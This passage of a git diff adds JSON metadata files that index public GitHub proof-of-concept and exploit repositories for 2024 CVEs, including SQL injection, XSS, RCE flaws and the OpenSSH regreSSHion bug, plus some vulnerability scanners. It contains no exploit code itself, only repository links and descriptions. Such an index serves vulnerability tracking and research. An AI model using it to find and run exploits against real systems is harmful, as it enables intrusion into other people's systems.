at end of file diff --git a/2024/CVE-2024-5737.json b/2024/CVE-2024-5737.json new file mode 100644 index 0000000000..0e22196df0 --- /dev/null +++ b/2024/CVE-2024-5737.json @@ -0,0 +1,33 @@ +[ + { + "id": 821343815, + "name": "CVE-2024-5737", + "full_name": "afine-com\/CVE-2024-5737", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-5737", + "description": "AdmirorFrames Joomla! Extension < 5.0 - HTML Injection", + "fork": false, + "created_at": "2024-06-28T10:27:35Z", + "updated_at": "2024-06-28T10:37:10Z", + "pushed_at": "2024-06-28T10:36:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5764.json b/2024/CVE-2024-5764.json new file mode 100644 index 0000000000..9c29888253 --- /dev/null +++ b/2024/CVE-2024-5764.json @@ -0,0 +1,33 @@ +[ + { + "id": 888675608, + "name": "CVE-2024-5764", + "full_name": "fin3ss3g0d\/CVE-2024-5764", + "owner": { + "login": "fin3ss3g0d", + "id": 62859381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62859381?v=4", + "html_url": "https:\/\/github.com\/fin3ss3g0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fin3ss3g0d\/CVE-2024-5764", + "description": "CVE-2024-5764 exploitation script", + "fork": false, + "created_at": "2024-11-14T20:08:45Z", + "updated_at": "2024-11-20T16:31:10Z", + "pushed_at": "2024-11-14T20:11:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5806.json b/2024/CVE-2024-5806.json new file mode 100644 index 0000000000..c58f2b709d --- /dev/null +++ b/2024/CVE-2024-5806.json @@ -0,0 +1,33 @@ +[ + { + "id": 819504418, + "name": "watchTowr-vs-progress-moveit_CVE-2024-5806", + "full_name": "watchtowrlabs\/watchTowr-vs-progress-moveit_CVE-2024-5806", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/watchTowr-vs-progress-moveit_CVE-2024-5806", + "description": "Exploit for the CVE-2024-5806", + "fork": false, + "created_at": "2024-06-24T16:28:35Z", + "updated_at": "2025-01-02T13:12:49Z", + "pushed_at": "2024-06-24T16:52:12Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 42, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5910.json b/2024/CVE-2024-5910.json new file mode 100644 index 0000000000..4986751bb4 --- /dev/null +++ b/2024/CVE-2024-5910.json @@ -0,0 +1,33 @@ +[ + { + "id": 889262902, + "name": "Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464", + "full_name": "p33d\/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464", + "description": null, + "fork": false, + "created_at": "2024-11-15T23:46:01Z", + "updated_at": "2024-11-15T23:46:01Z", + "pushed_at": "2024-11-15T23:46:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5932.json b/2024/CVE-2024-5932.json new file mode 100644 index 0000000000..b01f448e3f --- /dev/null +++ b/2024/CVE-2024-5932.json @@ -0,0 +1,106 @@ +[ + { + "id": 845461331, + "name": "CVE-2024-5932-PoC", + "full_name": "0xb0mb3r\/CVE-2024-5932-PoC", + "owner": { + "login": "0xb0mb3r", + "id": 177725137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177725137?v=4", + "html_url": "https:\/\/github.com\/0xb0mb3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xb0mb3r\/CVE-2024-5932-PoC", + "description": "Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection ", + "fork": false, + "created_at": "2024-08-21T09:51:21Z", + "updated_at": "2024-12-13T10:58:23Z", + "pushed_at": "2024-12-13T10:58:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847287273, + "name": "CVE-2024-5932", + "full_name": "EQSTLab\/CVE-2024-5932", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-5932", + "description": "Proof-of-Concept for CVE-2024-5932", + "fork": false, + "created_at": "2024-08-25T11:51:36Z", + "updated_at": "2025-01-05T01:14:48Z", + "pushed_at": "2024-08-29T02:13:12Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-5932", + "exploit", + "givewp", + "object-injection", + "php", + "poc", + "proof-of-concept", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 10, + "watchers": 53, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871074593, + "name": "cve-2024-5932", + "full_name": "OxLmahdi\/cve-2024-5932", + "owner": { + "login": "OxLmahdi", + "id": 159675795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159675795?v=4", + "html_url": "https:\/\/github.com\/OxLmahdi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OxLmahdi\/cve-2024-5932", + "description": null, + "fork": false, + "created_at": "2024-10-11T08:12:38Z", + "updated_at": "2024-11-05T16:05:18Z", + "pushed_at": "2024-10-11T08:32:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5947.json b/2024/CVE-2024-5947.json new file mode 100644 index 0000000000..e64e5c54ee --- /dev/null +++ b/2024/CVE-2024-5947.json @@ -0,0 +1,33 @@ +[ + { + "id": 825338684, + "name": "CVE-2024-5947", + "full_name": "Cappricio-Securities\/CVE-2024-5947", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-5947", + "description": "Deep Sea Electronics DSE855 - Authentication Bypass", + "fork": false, + "created_at": "2024-07-07T14:03:49Z", + "updated_at": "2024-07-07T14:10:53Z", + "pushed_at": "2024-07-07T14:10:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5961.json b/2024/CVE-2024-5961.json new file mode 100644 index 0000000000..c4863b9610 --- /dev/null +++ b/2024/CVE-2024-5961.json @@ -0,0 +1,33 @@ +[ + { + "id": 822555530, + "name": "CVE-2024-5961", + "full_name": "kac89\/CVE-2024-5961", + "owner": { + "login": "kac89", + "id": 5662731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5662731?v=4", + "html_url": "https:\/\/github.com\/kac89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kac89\/CVE-2024-5961", + "description": "Reflected XSS in 2ClickPortal", + "fork": false, + "created_at": "2024-07-01T11:17:48Z", + "updated_at": "2024-07-01T14:35:08Z", + "pushed_at": "2024-07-01T14:35:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6028.json b/2024/CVE-2024-6028.json new file mode 100644 index 0000000000..dcf3e30e9b --- /dev/null +++ b/2024/CVE-2024-6028.json @@ -0,0 +1,33 @@ +[ + { + "id": 819950639, + "name": "CVE-2024-6028-Poc", + "full_name": "truonghuuphuc\/CVE-2024-6028-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-6028-Poc", + "description": "CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Unauthenticated SQL Injection via 'ays_questions' Parameter", + "fork": false, + "created_at": "2024-06-25T13:55:27Z", + "updated_at": "2024-06-30T06:22:14Z", + "pushed_at": "2024-06-26T01:17:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6043.json b/2024/CVE-2024-6043.json new file mode 100644 index 0000000000..a3b043cae0 --- /dev/null +++ b/2024/CVE-2024-6043.json @@ -0,0 +1,36 @@ +[ + { + "id": 843922045, + "name": "CVE-2024-6043", + "full_name": "lfillaz\/CVE-2024-6043", + "owner": { + "login": "lfillaz", + "id": 114345508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114345508?v=4", + "html_url": "https:\/\/github.com\/lfillaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfillaz\/CVE-2024-6043", + "description": "This Python tool exploits the CVE-2024-6043 vulnerability, which affects the SourceCodester Best House Rental Management System 1.0. The vulnerability allows remote attackers to perform SQL Injection via the `admin_class.php` file, specifically targeting the `username` parameter", + "fork": false, + "created_at": "2024-08-17T20:30:28Z", + "updated_at": "2024-08-22T02:30:08Z", + "pushed_at": "2024-08-17T21:56:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "scaner" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6050.json b/2024/CVE-2024-6050.json new file mode 100644 index 0000000000..704c282663 --- /dev/null +++ b/2024/CVE-2024-6050.json @@ -0,0 +1,33 @@ +[ + { + "id": 822644855, + "name": "CVE-2024-6050", + "full_name": "kac89\/CVE-2024-6050", + "owner": { + "login": "kac89", + "id": 5662731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5662731?v=4", + "html_url": "https:\/\/github.com\/kac89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kac89\/CVE-2024-6050", + "description": "Reflected XSS in SOWA OPAC", + "fork": false, + "created_at": "2024-07-01T14:31:37Z", + "updated_at": "2024-07-01T22:01:03Z", + "pushed_at": "2024-07-01T14:33:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6095.json b/2024/CVE-2024-6095.json new file mode 100644 index 0000000000..4bfb1503ea --- /dev/null +++ b/2024/CVE-2024-6095.json @@ -0,0 +1,33 @@ +[ + { + "id": 850674192, + "name": "-CVE-2024-6095", + "full_name": "Abdurahmon3236\/-CVE-2024-6095", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/-CVE-2024-6095", + "description": null, + "fork": false, + "created_at": "2024-09-01T13:12:20Z", + "updated_at": "2024-09-01T13:13:09Z", + "pushed_at": "2024-09-01T13:13:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6205.json b/2024/CVE-2024-6205.json new file mode 100644 index 0000000000..3d44dad7ac --- /dev/null +++ b/2024/CVE-2024-6205.json @@ -0,0 +1,33 @@ +[ + { + "id": 831611165, + "name": "CVE-2024-6205", + "full_name": "j3r1ch0123\/CVE-2024-6205", + "owner": { + "login": "j3r1ch0123", + "id": 110147529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110147529?v=4", + "html_url": "https:\/\/github.com\/j3r1ch0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3r1ch0123\/CVE-2024-6205", + "description": "This is a python written PoC of a recent vulnerability in a wordpress plugin. More information on that here", + "fork": false, + "created_at": "2024-07-21T04:59:31Z", + "updated_at": "2024-08-18T18:15:10Z", + "pushed_at": "2024-08-18T18:15:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6222.json b/2024/CVE-2024-6222.json new file mode 100644 index 0000000000..baada9b454 --- /dev/null +++ b/2024/CVE-2024-6222.json @@ -0,0 +1,33 @@ +[ + { + "id": 838983610, + "name": "CVE-2024-6222", + "full_name": "Florian-Hoth\/CVE-2024-6222", + "owner": { + "login": "Florian-Hoth", + "id": 177672507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177672507?v=4", + "html_url": "https:\/\/github.com\/Florian-Hoth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Florian-Hoth\/CVE-2024-6222", + "description": "Docker Extension\/Dashboard RCE Vulnerability", + "fork": false, + "created_at": "2024-08-06T18:20:46Z", + "updated_at": "2024-08-15T17:08:30Z", + "pushed_at": "2024-08-06T18:21:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6330.json b/2024/CVE-2024-6330.json new file mode 100644 index 0000000000..50d813a24b --- /dev/null +++ b/2024/CVE-2024-6330.json @@ -0,0 +1,33 @@ +[ + { + "id": 891325737, + "name": "CVE-2024-6330", + "full_name": "RandomRobbieBF\/CVE-2024-6330", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-6330", + "description": "GEO my WordPress < 4.5.0.2 - Unauthenticated LFI to RCE\/PHAR Deserialization", + "fork": false, + "created_at": "2024-11-20T06:08:32Z", + "updated_at": "2025-01-06T13:22:43Z", + "pushed_at": "2024-12-13T14:00:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6366.json b/2024/CVE-2024-6366.json new file mode 100644 index 0000000000..b454dbe150 --- /dev/null +++ b/2024/CVE-2024-6366.json @@ -0,0 +1,33 @@ +[ + { + "id": 837558368, + "name": "CVE-2024-6366", + "full_name": "Abdurahmon3236\/CVE-2024-6366", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-6366", + "description": null, + "fork": false, + "created_at": "2024-08-03T10:30:49Z", + "updated_at": "2024-08-03T19:35:41Z", + "pushed_at": "2024-08-03T19:35:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6386.json b/2024/CVE-2024-6386.json new file mode 100644 index 0000000000..a2d00e0d1a --- /dev/null +++ b/2024/CVE-2024-6386.json @@ -0,0 +1,33 @@ +[ + { + "id": 852855160, + "name": "CVE-2024-6386", + "full_name": "argendo\/CVE-2024-6386", + "owner": { + "login": "argendo", + "id": 42393831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42393831?v=4", + "html_url": "https:\/\/github.com\/argendo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/argendo\/CVE-2024-6386", + "description": "Research and PoC for CVE-2024-6386", + "fork": false, + "created_at": "2024-09-05T14:44:36Z", + "updated_at": "2024-11-03T07:36:10Z", + "pushed_at": "2024-09-08T19:09:36Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-6387.json b/2024/CVE-2024-6387.json new file mode 100644 index 0000000000..6fdebed19b --- /dev/null +++ b/2024/CVE-2024-6387.json @@ -0,0 +1,2950 @@ +[ + { + "id": 822546559, + "name": "cve-2024-6387-poc", + "full_name": "zgzhang\/cve-2024-6387-poc", + "owner": { + "login": "zgzhang", + "id": 11416832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11416832?v=4", + "html_url": "https:\/\/github.com\/zgzhang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zgzhang\/cve-2024-6387-poc", + "description": "a signal handler race condition in OpenSSH's server (sshd)", + "fork": false, + "created_at": "2024-07-01T10:55:29Z", + "updated_at": "2025-01-07T04:25:05Z", + "pushed_at": "2024-07-01T10:54:02Z", + "stargazers_count": 473, + "watchers_count": 473, + "has_discussions": false, + "forks_count": 182, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 182, + "watchers": 473, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 822579775, + "name": "cve-2024-6387-poc", + "full_name": "acrono\/cve-2024-6387-poc", + "owner": { + "login": "acrono", + "id": 51956758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51956758?v=4", + "html_url": "https:\/\/github.com\/acrono", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acrono\/cve-2024-6387-poc", + "description": "32-bit PoC for CVE-2024-6387 — mirror of the original 7etsuo\/cve-2024-6387-poc", + "fork": false, + "created_at": "2024-07-01T12:16:21Z", + "updated_at": "2025-01-07T21:15:42Z", + "pushed_at": "2024-07-01T12:25:01Z", + "stargazers_count": 379, + "watchers_count": 379, + "has_discussions": false, + "forks_count": 90, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 90, + "watchers": 379, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 822584501, + "name": "cve-2024-6387-poc", + "full_name": "lflare\/cve-2024-6387-poc", + "owner": { + "login": "lflare", + "id": 22326991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22326991?v=4", + "html_url": "https:\/\/github.com\/lflare", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lflare\/cve-2024-6387-poc", + "description": "MIRROR of the original 32-bit PoC for CVE-2024-6387 \"regreSSHion\" by 7etsuo\/cve-2024-6387-poc", + "fork": false, + "created_at": "2024-07-01T12:26:40Z", + "updated_at": "2025-01-02T12:21:22Z", + "pushed_at": "2024-07-25T04:23:11Z", + "stargazers_count": 111, + "watchers_count": 111, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "openssh", + "poc", + "rce", + "regresshion", + "ssh" + ], + "visibility": "public", + "forks": 40, + "watchers": 111, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 822593995, + "name": "cve-2024-6387-poc", + "full_name": "shyrwall\/cve-2024-6387-poc", + "owner": { + "login": "shyrwall", + "id": 1523968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1523968?v=4", + "html_url": "https:\/\/github.com\/shyrwall", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shyrwall\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-01T12:48:36Z", + "updated_at": "2024-07-01T12:50:32Z", + "pushed_at": "2024-07-01T12:50:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822595195, + "name": "CVE-2024-6387-PoC", + "full_name": "getdrive\/CVE-2024-6387-PoC", + "owner": { + "login": "getdrive", + "id": 20697688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20697688?v=4", + "html_url": "https:\/\/github.com\/getdrive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/getdrive\/CVE-2024-6387-PoC", + "description": "PoC RCE in OpenSSH", + "fork": false, + "created_at": "2024-07-01T12:51:18Z", + "updated_at": "2024-12-08T12:41:06Z", + "pushed_at": "2024-07-01T13:34:47Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822620870, + "name": "CVE-2024-6387-POC", + "full_name": "FerasAlrimali\/CVE-2024-6387-POC", + "owner": { + "login": "FerasAlrimali", + "id": 51955818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51955818?v=4", + "html_url": "https:\/\/github.com\/FerasAlrimali", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FerasAlrimali\/CVE-2024-6387-POC", + "description": "SSHd cve-2024-6387-poc", + "fork": false, + "created_at": "2024-07-01T13:38:47Z", + "updated_at": "2024-07-01T13:42:18Z", + "pushed_at": "2024-07-01T13:42:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822634085, + "name": "cve-2024-6387-poc", + "full_name": "passwa11\/cve-2024-6387-poc", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-01T14:08:23Z", + "updated_at": "2024-07-27T19:01:18Z", + "pushed_at": "2024-07-01T14:10:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822746375, + "name": "CVE-2024-6387", + "full_name": "jack0we\/CVE-2024-6387", + "owner": { + "login": "jack0we", + "id": 150005594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150005594?v=4", + "html_url": "https:\/\/github.com\/jack0we", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jack0we\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-01T18:28:25Z", + "updated_at": "2024-07-01T18:32:44Z", + "pushed_at": "2024-07-01T18:32:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822788426, + "name": "CVE-2024-6387_Check", + "full_name": "xaitax\/CVE-2024-6387_Check", + "owner": { + "login": "xaitax", + "id": 5014849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4", + "html_url": "https:\/\/github.com\/xaitax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-6387_Check", + "description": "CVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH", + "fork": false, + "created_at": "2024-07-01T20:33:20Z", + "updated_at": "2024-12-27T14:16:32Z", + "pushed_at": "2024-09-24T19:18:56Z", + "stargazers_count": 461, + "watchers_count": 461, + "has_discussions": false, + "forks_count": 91, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "exploit", + "pentesting", + "python3", + "redteam" + ], + "visibility": "public", + "forks": 91, + "watchers": 461, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 822792125, + "name": "CVE-2024-6387", + "full_name": "bigb0x\/CVE-2024-6387", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-6387", + "description": "Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 , CVE-2008-4109 and others.", + "fork": false, + "created_at": "2024-07-01T20:45:53Z", + "updated_at": "2025-01-03T10:25:53Z", + "pushed_at": "2024-07-06T10:47:30Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "openssh", + "security-audit", + "security-tools", + "ssh", + "ssh-server" + ], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822824673, + "name": "regresshion-check", + "full_name": "wiggels\/regresshion-check", + "owner": { + "login": "wiggels", + "id": 16748278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16748278?v=4", + "html_url": "https:\/\/github.com\/wiggels", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wiggels\/regresshion-check", + "description": "CLI Tool to Check SSH Servers for Vulnerability to CVE-2024-6387", + "fork": false, + "created_at": "2024-07-01T22:53:32Z", + "updated_at": "2024-08-01T17:34:14Z", + "pushed_at": "2024-07-16T20:25:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822856797, + "name": "CVE-2024-6387", + "full_name": "3yujw7njai\/CVE-2024-6387", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": 